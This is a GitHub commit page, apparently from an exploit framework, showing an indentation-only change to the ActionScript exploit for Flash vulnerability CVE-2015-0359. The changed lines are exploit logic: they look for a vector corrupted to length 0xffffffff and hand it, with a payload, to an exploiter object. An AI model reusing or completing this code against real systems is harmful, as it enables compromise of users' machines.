Skip to content

Commit 2bb3a50

Browse files
committed
Fix else indentation
1 parent 1d05ce1 commit 2bb3a50

File tree

1 file changed

+14
-14
lines changed

1 file changed

+14
-14
lines changed

external/source/exploits/CVE-2015-0359/Exploit.as

Lines changed: 14 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -102,20 +102,20 @@ package
102102
Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
103103
if (mod == 1022) mc.receive()
104104
else {
105-
for (var i:uint = 0; i < ov.length; i++) {
106-
if (ov[i].length == 0xffffffff) {
107-
uv = ov[i]
108-
} else {
109-
if (ov[i] != null) {
110-
delete(ov[i])
111-
ov[i] = null
112-
}
113-
}
114-
}
115-
if (uv == null) {
116-
Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
117-
return
118-
}
105+
for (var i:uint = 0; i < ov.length; i++) {
106+
if (ov[i].length == 0xffffffff) {
107+
uv = ov[i]
108+
} else {
109+
if (ov[i] != null) {
110+
delete(ov[i])
111+
ov[i] = null
112+
}
113+
}
114+
}
115+
if (uv == null) {
116+
Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
117+
return
118+
}
119119
exploiter = new Exploiter(this, platform, os, payload, uv)
120120
}
121121
}

0 commit comments

Comments
 (0)